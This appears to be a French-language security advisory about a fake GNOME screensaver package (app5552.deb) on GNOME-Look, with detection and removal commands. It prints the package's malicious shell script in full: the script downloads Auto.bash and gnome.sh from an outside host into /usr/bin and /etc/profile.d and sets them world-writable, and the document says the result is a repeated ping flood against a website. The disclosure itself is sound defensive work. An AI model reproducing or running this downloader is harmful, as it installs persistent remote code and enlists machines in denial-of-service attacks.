Téléchargé à partir d'un site de partage d'artworks pour GNOME, le fichier app5552.deb récupéré hors des sources d'installations de la distribution Linux Ubuntu contenait une commande wget de récupération d'un autre script avec pour finalité un ping répété 65507 fois vers le site mmowned.com (ping -s 65507 www.mmowned.com)

le script de base

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

Si vous avez tenté d'installer un écran de veille dénommé "WaterFall Screensaver" pour GNOME dernièrement sur le site GNOME-Look, vérifiez si votre machine contiendrait le fameux script en exécutant la commande "locate Auto.bash".

Si la commande retourne la ligne "/usr/bin/Auto.bash", lancez
"sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash"

puis "sudo dpkg -r app5552" dans un terminal pour supprimer les scripts.

Adresse d'origine du faux écran de veille sur GNOME-Look.org :
http://gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772